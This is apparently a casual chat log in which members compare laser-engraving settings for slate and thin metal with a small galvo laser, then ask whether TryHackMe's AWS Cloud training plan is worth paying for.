Some colours translate better
yep. more range of colors are better. and depend of material
for b/w pictures, simple one engraving goes fast. for this slates it need 20ish min for 2k pic with around 2k mm/s. if i convert to 8k it need 45 min cca. and all also depend of LPI (same as DPI, just this is lines per inch)
Aye
and it helps since is galvo laser. but down thing is is only 2w IR laser. if i get fiber galvo of 60/80/100 w i can do 3d relief on metal coins and so. which will be rly nice π
Has anyone here looked at the AWS Cloud plan on TryHackMe? Is it worth it?
A few people have enjoyed it.
id assume it also depends on if you're interested in cloud security, if so then probably yes 
Worth it?
Depends on your PoV, difference of opinions and all.
Would be interesting to hear from someone who has taken it
i haven't looked at it, but going off the rest of the site, if its a topic you're interested in its probably worth
@lean panther has taken it, but they're NZ timezone so not sure when they can reply.
@shell nova and wish to cut metal sheet to cut 0.2 mm metal i need around 200 passes
https://youtube.com/shorts/IVg62xinn2c this is time laps of it π¦
It's not meant for cutting
Tell that to all Bond villains
